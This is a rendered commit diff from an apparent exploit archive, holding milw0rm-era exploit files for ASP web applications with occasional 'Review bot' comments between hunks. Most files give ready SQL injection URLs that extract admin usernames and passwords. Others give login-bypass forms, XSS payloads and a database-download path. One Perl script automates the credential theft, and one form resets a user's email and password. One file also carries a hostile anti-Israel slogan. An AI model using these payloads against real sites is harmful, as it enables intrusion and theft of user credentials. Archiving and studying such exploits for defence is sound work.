Updated 12_08_2013

Offensive Security 2013-12-08 16:08:13 +00:00
parent 2039e282e8
commit 5a468df6b9
383 changed files with 31976 additions and 28274 deletions

4031
files.csv

File diff suppressed because it is too large


@ -1,37 +1,37 @@
<!-- <!--
Vulnerable products : Vulnerable products :
webwiz site news access2000 : vesion 3.06 and prior versions webwiz site news access2000 : vesion 3.06 and prior versions
webwiz journal access2000 : version 1.0 webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 and prior versions webwiz weekly poll access2000 : version 3.06 and prior versions
database login access2000 : version 1.71 and prior versions database login access2000 : version 1.71 and prior versions
webwiz site news access97 : version 3.06 and prior versions webwiz site news access97 : version 3.06 and prior versions
webwiz journal access97 : version 1.0 webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 and prior versions webwiz weekly poll access97 : version 3.06 and prior versions
database login access97 : version 1.71 and prior versions database login access97 : version 1.71 and prior versions
Proof of Concepts : Proof of Concepts :
--> -->
<html> <html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1> <h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p> <p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p> <p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp"> <form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="'union all select '1','1' from tblConfiguration where ''='"> <input type="hidden" name="txtUserName" value="'union all select '1','1' from tblConfiguration where ''='">
<input type="hidden" name="txtUserPass" value="1"> <input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit"> <input type="submit" value="Submit" name="submit">
</form></html> </form></html>
<html> <html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1> <h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p> <p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p> <p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp"> <form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="'union select 1 from tblusers where''='"> <input type="hidden" name="txtUserName" value="'union select 1 from tblusers where''='">
<input type="hidden" name="txtUserPass" value="1"> <input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit"> <input type="submit" value="Submit" name="submit">
</form></html> </form></html>
# milw0rm.com [2005-12-30] # milw0rm.com [2005-12-30]
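Review bot: the old and new columns are identical on every line of this hunk, from the `<!--` header down to `# milw0rm.com [2005-12-30]`, so nothing in the rendered diff shows what actually changed; the same holds for the other `-1,N +1,N` hunks in this view. If the change is a line-ending or trailing-whitespace normalization, the commit message (`Updated 12_08_2013`, 383 files, 31976 additions and 28274 deletions) should say so, and any real content edits should go in a separate commit where they can be reviewed rather than being buried in a whole-file rewrite.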


@ -1,19 +1,19 @@
################################################################################ ################################################################################
## ## ## ##
## Icblogger <= "YID" Remote Blind SQL Injection ## ## Icblogger <= "YID" Remote Blind SQL Injection ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ## ## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ## ## Mail | ChironeX.FleckeriX@Gmail.Com ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ## ## ##
################################################################################ ################################################################################
########################################################################################################################################################################## ##########################################################################################################################################################################
#Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 # #Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #
########################################################################################################################################################################## ##########################################################################################################################################################################
############################################################# #############################################################
#Admin Panel : http://www.target.com/path/admin/default.asp # #Admin Panel : http://www.target.com/path/admin/default.asp #
############################################################# #############################################################
# milw0rm.com [2006-09-01] # milw0rm.com [2006-09-01]


@ -1,20 +1,20 @@
+++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++
+ Haberx v1.1 (tr) SQL Injection Vulnerability + + Haberx v1.1 (tr) SQL Injection Vulnerability +
+ Author : Fix TR + + Author : Fix TR +
+ Site : www.hack.gen.tr + + Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com + + Contact : fixtr[at]bsdmail.com +
+++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++
+ Download: http://www.aspindir.com/Goster/3983 + Download: http://www.aspindir.com/Goster/3983
+ Versions: 1.02 between 1.1 + Versions: 1.02 between 1.1
+ Bug In : kategorix.asp + Bug In : kategorix.asp
+ Risk : High + Risk : High
+ Admin Nick: + Admin Nick:
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1 http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1
+ Admin Password: (Big Letters) + Admin Password: (Big Letters)
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1 http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1
# milw0rm.com [2006-09-15] # milw0rm.com [2006-09-15]


@ -1,41 +1,41 @@
Vulnerability Report Vulnerability Report
******************************************************************************* *******************************************************************************
# Title : Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability # Title : Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Script Page : http://www.charon.co.uk # Script Page : http://www.charon.co.uk
# Exploit; # Exploit;
******************************************************************************* *******************************************************************************
###http://[target]/[path]/Review.asp?ProductID=[SQL HERE] ###http://[target]/[path]/Review.asp?ProductID=[SQL HERE]
Example: Example:
//Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20Customers%20Where%20CustomerID%20=%201 //Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20Customers%20Where%20CustomerID%20=%201
//Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers%20Where%20CustomerID%20=%201 //Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers%20Where%20CustomerID%20=%201
Email and Password ==> login.asp [L0gin P4Ge] Email and Password ==> login.asp [L0gin P4Ge]
Columns; Columns;
""""""""""""""""""""" """""""""""""""""""""
CustomerID CustomerID
""""""""""""""""""""" """""""""""""""""""""
CustomerEmail CustomerEmail
""""""""""""""""""""" """""""""""""""""""""
CustomerPassword CustomerPassword
""""""""""""""""""""" """""""""""""""""""""
ShipCountry ShipCountry
""""""""""""""""""""" """""""""""""""""""""
Phone Phone
""""""""""""""""""""" """""""""""""""""""""
......... .........
""""""""""""""""""""" """""""""""""""""""""
.... ....
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-09-17] # milw0rm.com [2006-09-17]


@ -1,19 +1,19 @@
******************************************************************************* *******************************************************************************
# Title : Estate Agent Manager <= v1.3 (default.asp) Remote Login ByPass SQL Injection Vulnerability # Title : Estate Agent Manager <= v1.3 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann # Author : ajann
******************************************************************************* *******************************************************************************
Example: Example:
###http://[target]/[path]/admin/ ###http://[target]/[path]/admin/
UserName: ' union select 0,0 from admin UserName: ' union select 0,0 from admin
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-13] # milw0rm.com [2006-11-13]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24033/info
VP-ASP Shopping Cart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
VP-ASP Shopping Cart 6.50 is vulnerable; other versions may also be affected.
<!-- VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability A cross-site scripting vulnerability in VP-ASP Shopping Cart 6.50 was discovered. The vendor, VP-ASP, shipped an official patch on May 16th, 2007. Vulnerable Variable: type Vulnerable File: shopcontent.asp Vulnerable: VP-ASP Shopping Cart 6.50 (other versions should also be vulnerable) Google d0rk: intitle:"VP-ASP Shopping Cart 6.50" John Martinelli john@martinelli.com RedLevel Security http://www.RedLevel.org May 16th, 2007 !--> <html> <head><title>VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability</title><body> <center><br><br> <font size=4>VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability</font><br> <font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br> Google d0rk: <a href="http://www.google.com/search?q=intitle%3A%22VP-ASP+Shopping+Cart+6.50%22">intitle:"VP-ASP Shopping Cart 6.50"</a> </font><br><br><br> <center>file <b>shopcontent.asp</b> - variable <b>type</b> - method <b>get</b></center><br> <form action="http://www.example.com/shop/shopcontent.asp" method="get"> <input size=75 name="type" value="<body onload=alert(1)>"> <input type=submit value="Execute XSS Attack" class="button"> </form> <br><br><br> </form> </body></html>
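Review bot: the header added at the top of this new file states that 6.50 is vulnerable and that other versions may be affected, but omits the fix status that the embedded advisory itself records (`The vendor, VP-ASP, shipped an official patch on May 16th, 2007`); suggest carrying that date into the header so the archive entry indicates a vendor fix exists. Minor: the embedded advisory closes its comment with `!-->`, which browsers still treat as the end of the comment but is not the standard `-->` delimiter.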


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24119/info
Cisco CallManager is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
Cisco CallManager 4.1.1 is reported vulnerable; other versions may also be affected.
https://www.example.com/CCMAdmin/serverlist.asp?findBy=servername&match=begins&pattern=[xss]
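Review bot: this new file carries the source URL, the description, the affected version (4.1.1) and the PoC URL, but no date, credit or fix reference, whereas the milw0rm-format files in this commit at least end with a dated `# milw0rm.com [YYYY-MM-DD]` line; suggest adding the advisory date from the securityfocus source so the entry can be correlated with Cisco's fix.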


@ -1,103 +1,103 @@
#!/usr/bin/perl #!/usr/bin/perl
#[Script Name: Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit #[Script Name: Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit
#[Coded by : ajann #[Coded by : ajann
#[Author : ajann #[Author : ajann
#[Contact : :( #[Contact : :(
#[S.Page : http://www.websitedesignsforless.com #[S.Page : http://www.websitedesignsforless.com
#[$$ : $9.95 #[$$ : $9.95
#[Message : Tum Musluman Aleminin Kurban Bayrami Mubarek Olsun #.. #[Message : Tum Musluman Aleminin Kurban Bayrami Mubarek Olsun #..
#[.. : ajann,Turkey #[.. : ajann,Turkey
# 2006.01 //coupon_detail.asp?key=-1%20union%20select%200,0,xusername,0,0,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%201 # 2006.01 //coupon_detail.asp?key=-1%20union%20select%200,0,xusername,0,0,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%201
use IO::Socket; use IO::Socket;
if(@ARGV < 1){ if(@ARGV < 1){
print " print "
[======================================================================== [========================================================================
[// Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit [// Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com [// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com [// Example: exploit.pl victim.com
[// Vuln&Exp : ajann [// Vuln&Exp : ajann
[======================================================================== [========================================================================
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$host = "http://".$server; $host = "http://".$server;
$port = "80"; $port = "80";
$file = "/coupon_detail.asp?key="; $file = "/coupon_detail.asp?key=";
print "Script <DIR> : "; print "Script <DIR> : ";
$dir = <STDIN>; $dir = <STDIN>;
chop ($dir); chop ($dir);
if ($dir =~ /exit/){ if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n"; print "-- Exploit Failed[You Are Exited] \n";
exit(); exit();
} }
if ($dir =~ /\//){} if ($dir =~ /\//){}
else { else {
print "-- Exploit Failed[No DIR] \n"; print "-- Exploit Failed[No DIR] \n";
exit(); exit();
} }
print "User <ID> : "; print "User <ID> : ";
$ID = <STDIN>; $ID = <STDIN>;
chop ($ID); chop ($ID);
if ($ID =~ /exit/){ if ($ID =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n"; print "-- Exploit Failed[You Are Exited] \n";
exit(); exit();
} }
$len=length($ID); $len=length($ID);
if ($len == 1){} if ($len == 1){}
else { else {
print "-- Exploit Failed[No User Id] \n"; print "-- Exploit Failed[No User Id] \n";
exit(); exit();
} }
$target = "-1%20union%20select%200,0,0,xusername,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%20".$ID; $target = "-1%20union%20select%200,0,0,xusername,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%20".$ID;
$target = $host.$dir.$file.$target; $target = $host.$dir.$file.$target;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n"; print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n"; print $socket "Host: $server\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /color=\"#FF0000\">(.*?)<\/font>/){ if ($answer =~ /color=\"#FF0000\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Username: $1\n"; print "+ Username: $1\n";
} }
if ($answer =~ /<font size=\"4\"><b>(.*?)<br>/){ if ($answer =~ /<font size=\"4\"><b>(.*?)<br>/){
print "+ Password: $1\n"; print "+ Password: $1\n";
} }
if ($answer =~ /Syntax error/) { if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
# milw0rm.com [2006-12-30] # milw0rm.com [2006-12-30]


@ -1,25 +1,25 @@
******************************************************************************* *******************************************************************************
# Title : ASP NEWS <= V3 (news_detail.asp) Remote SQL Injection Vulnerability # Title : ASP NEWS <= V3 (news_detail.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
# S.Page : http://www.planetgraphic.de/ # S.Page : http://www.planetgraphic.de/
******************************************************************************* *******************************************************************************
[[SQL]]]--------------------------------------------------------- [[SQL]]]---------------------------------------------------------
http://[target]/[path]//news_detail.asp?id=[SQL] http://[target]/[path]//news_detail.asp?id=[SQL]
Example: Example:
//news_detail.asp?id=-1%20union%20select%200,username,password,0,0,0%20from%20tblusers //news_detail.asp?id=-1%20union%20select%200,username,password,0,0,0%20from%20tblusers
[[/SQL]] [[/SQL]]
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2007-01-24] # milw0rm.com [2007-01-24]


@ -1,26 +1,26 @@
******************************************************************************* *******************************************************************************
# Title : makit news/blog poster <=v3(news_page.asp) Remote SQL Injection Vulnerability # Title : makit news/blog poster <=v3(news_page.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
# S.Page : http://www.makit.net # S.Page : http://www.makit.net
# $$ : Free # $$ : Free
******************************************************************************* *******************************************************************************
[[SQL]]]--------------------------------------------------------- [[SQL]]]---------------------------------------------------------
http://[target]/[path]//news_page.asp?uid=[SQL] http://[target]/[path]//news_page.asp?uid=[SQL]
Example: Example:
//news_page.asp?uid=-1'%20union%20select%200,0,0,uname,pword,0,0,0%20from%20users%20where%20'1=1 //news_page.asp?uid=-1'%20union%20select%200,0,0,uname,pword,0,0,0%20from%20users%20where%20'1=1
[[/SQL]] [[/SQL]]
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2007-01-25] # milw0rm.com [2007-01-25]


@ -1,30 +1,30 @@
=================================X=O=R=O=N================================= =================================X=O=R=O=N=================================
Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability
=================================X=O=R=O=N================================= =================================X=O=R=O=N=================================
Bulan: xoron Bulan: xoron
xoron.info - xoron.biz xoron.info - xoron.biz
=================================X=O=R=O=N================================= =================================X=O=R=O=N=================================
POC: pop_profile.asp?mode=display&id=[SQL-INJ] POC: pop_profile.asp?mode=display&id=[SQL-INJ]
=================================X=O=R=O=N================================= =================================X=O=R=O=N=================================
Username: Username:
pop_profile.asp?mode=display&id=1 pop_profile.asp?mode=display&id=1
Pass: Pass:
pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS
=================================X=O=R=O=N================================= =================================X=O=R=O=N=================================
Thanx: str0ke, kacper, shika Thanx: str0ke, kacper, shika
Tesekkurler: pang0, chaos, can bjorn, DJR Tesekkurler: pang0, chaos, can bjorn, DJR
=================================X=O=R=O=N================================= =================================X=O=R=O=N=================================
# milw0rm.com [2007-02-16] # milw0rm.com [2007-02-16]


@ -1,44 +1,44 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor:www.activewebsoftwares.com [~]Vendor:www.activewebsoftwares.com
[~]Software: Active Force Matrix v 2 [~]Software: Active Force Matrix v 2
[~]author: ((я3d D3v!L)) [~]author: ((я3d D3v!L))
[~] Date: 28.11.2008 [~] Date: 28.11.2008
[~] Home: www.ahacker.biz [~] Home: www.ahacker.biz
[~] contact: N/A [~] contact: N/A
[~] ----------------------------------------------------------- [~] -----------------------------------------------------------
[~] Exploit: [~] Exploit:
username: r0' or ' 1=1-- username: r0' or ' 1=1--
password: r0' or ' 1=1-- password: r0' or ' 1=1--
[~]login 4 d3m0: [~]login 4 d3m0:
http://www.activewebsoftwares.com/demoactiveforcematrix/account.asp http://www.activewebsoftwares.com/demoactiveforcematrix/account.asp
[~]-------------------------------------------------------------------------------- [~]--------------------------------------------------------------------------------
[~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري
[~] [~]
[~] spechial thanks : dolly & 7am3m & عماد & {str0ke} [~] spechial thanks : dolly & 7am3m & عماد & {str0ke}
[~] [~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~] [~]
[~] xp10.biz & ahacker.biz [~] xp10.biz & ahacker.biz
[~] [~]
[~]-------------------------------------------------------------------------------- [~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29] # milw0rm.com [2008-11-29]


@ -1,15 +1,15 @@
######################################################### #########################################################
--------------------------------------------------------- ---------------------------------------------------------
Portal Name: Discussion Web Portal Name: Discussion Web
Version : 4.0 Version : 4.0
Vendor : http://www.takempis.com/aboutdiscussion.htm Vendor : http://www.takempis.com/aboutdiscussion.htm
Author : Pouya_Server , Pouya.s3rver@Gmail.com Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD) Vulnerability : (DD)
--------------------------------------------------------- ---------------------------------------------------------
######################################################### #########################################################
[DD]: [DD]:
http://site.com/[Path]/_private/discussion.mdb http://site.com/[Path]/_private/discussion.mdb
--------------------------------- ---------------------------------
# milw0rm.com [2008-12-14] # milw0rm.com [2008-12-14]


@ -1,30 +1,30 @@
########################################################################### ###########################################################################
#-------------------------------AlpHaNiX----------------------------------# #-------------------------------AlpHaNiX----------------------------------#
########################################################################### ###########################################################################
#Found By : AlpHaNiX #Found By : AlpHaNiX
#website : www.offensivetrack.org #website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ #contact : AlpHa[AT]HACKER[DOT]BZ
########################################################################### ###########################################################################
#script : RealtyListing V1/V2 #script : RealtyListing V1/V2
#download : null #download : null
#Demo : http://www.aspsiteware.com/Realty1 #Demo : http://www.aspsiteware.com/Realty1
http://www.aspsiteware.com/realty2/realty2/ http://www.aspsiteware.com/realty2/realty2/
########################################################################### ###########################################################################
#Exploits : #Exploits :
--=[SQL INJECTION]=-- --=[SQL INJECTION]=--
http://www.aspsiteware.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users# http://www.aspsiteware.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.aspsiteware.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users# http://www.aspsiteware.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.aspsiteware.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users http://www.aspsiteware.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.aspsiteware.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users http://www.aspsiteware.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
########################################################################### ###########################################################################
# milw0rm.com [2008-12-14] # milw0rm.com [2008-12-14]


@ -1,127 +1,127 @@
******************************************************************************* *******************************************************************************
# Title : Comersus Shopping Cart <= v6 Remote User Pass Exploit # Title : Comersus Shopping Cart <= v6 Remote User Pass Exploit
# Author : "ajann" from Turkey # Author : "ajann" from Turkey
# Contact : :( # Contact : :(
# S.Page : http://www.comersus.com/ # S.Page : http://www.comersus.com/
# $$ : Free # $$ : Free
# Dork : Powered by Comersus v6 Shopping Cart # Dork : Powered by Comersus v6 Shopping Cart
# DorkEx : # DorkEx :
http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&btnG=Ara&meta= http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&btnG=Ara&meta=
KAHROLSUN ISRAEL KAHROLSUN ISRAEL
-Register Site -Register Site
-Login -Login
-Open Exploit -Open Exploit
-Edit: User Email , User Password -Edit: User Email , User Password
-Submit Form -Submit Form
******************************************************************************* *******************************************************************************
<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp"> <form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp">
<table width="421" border="0"> <table width="421" border="0">
<tr> <tr>
</tr> </tr>
<tr> <tr>
<td width="168">Name</td> <td width="168">Name</td>
<td width="220"> <td width="220">
<input type=text name=customerName value="test"> <input type=text name=customerName value="test">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">Last Name</td> <td width="168">Last Name</td>
<td width="220"> <td width="220">
<input type=text name=lastName value="test"> <input type=text name=lastName value="test">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">Company</td> <td width="168">Company</td>
<td width="220"> <td width="220">
<input type=text name=customerCompany value="test"> <input type=text name=customerCompany value="test">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">Phone</td> <td width="168">Phone</td>
<td width="220"> <td width="220">
<input type=text name=phone value="123456789"> <input type=text name=phone value="123456789">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168"><strong>Email</strong></td> <td width="168"><strong>Email</strong></td>
<td width="220"> <td width="220">
<input type="text" name="email" value="Please Add Mail"> <input type="text" name="email" value="Please Add Mail">
Edit Edit
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168"><strong>Password</strong></td> <td width="168"><strong>Password</strong></td>
<td width="220"> <td width="220">
<input type=text name=password value="Please Add Pass"> <input type=text name=password value="Please Add Pass">
Edit Edit
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">Address</td> <td width="168">Address</td>
<td width="220"> <td width="220">
<input type=text name=address value="test"> <input type=text name=address value="test">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">Zip</td> <td width="168">Zip</td>
<td width="220"> <td width="220">
<input type=text name=zip value="08050"> <input type=text name=zip value="08050">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">State</td> <td width="168">State</td>
<td width="220"> <td width="220">
<SELECT name=stateCode size=1> <SELECT name=stateCode size=1>
<OPTION value="">Select the state <OPTION value="">Select the state
<option value="1">Please Type County below <option value="1">Please Type County below
</OPTION> </OPTION>
</SELECT> </SELECT>
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">Non listed state</td> <td width="168">Non listed state</td>
<td width="220"> <td width="220">
<input type=text name=state value=""> <input type=text name=state value="">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">City</td> <td width="168">City</td>
<td width="220"> <td width="220">
<input type=text name=city value="test"> <input type=text name=city value="test">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">Country</td> <td width="168">Country</td>
<td width="220"> <td width="220">
<SELECT name=countryCode> <SELECT name=countryCode>
<OPTION value="">Select the country <OPTION value="">Select the country
<option value="AF" selected>AFGHANISTAN <option value="AF" selected>AFGHANISTAN
</OPTION> </OPTION>
</SELECT> </SELECT>
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">&nbsp;</td> <td width="168">&nbsp;</td>
<td width="220">&nbsp;</td> <td width="220">&nbsp;</td>
</tr> </tr>
<tr> <tr>
<td colspan="2"> <td colspan="2">
<input type="submit" name="Modify" value="Modify"> <input type="submit" name="Modify" value="Modify">
</td> </td>
</tr> </tr>
</table> </table>
</form> </form>
# milw0rm.com [2009-01-12] # milw0rm.com [2009-01-12]
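Review bot: every line in this hunk shows identical content on the old and new side, so the change is line endings or trailing whitespace only; that should be stated in the commit message, because a whitespace-only rewrite of an archived exploit file is otherwise indistinguishable from a content edit when auditing the history (git diff -w on this file should come back empty). Separately, the email and password inputs are pre-filled with the placeholders "Please Add Mail" and "Please Add Pass", so the file should say which of the posted fields the target actually validates before a reader can tell what the Modify request changes.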

View file

@ -1,44 +1,44 @@
@~~=======================================~~@ @~~=======================================~~@
====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG===== ====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG=====
@~~=======================================~~@ @~~=======================================~~@
@~~=Author : ByALBAYX @~~=Author : ByALBAYX
@~~=Website : WWW.C4TEAM.ORG @~~=Website : WWW.C4TEAM.ORG
@~~=From : Turkish @~~=From : Turkish
@~~=======================================~~@ @~~=======================================~~@
@~~=Script :SkyPortal Downloads Manager v1.1 @~~=Script :SkyPortal Downloads Manager v1.1
@~~=S.Site :http://skyportal.net @~~=S.Site :http://skyportal.net
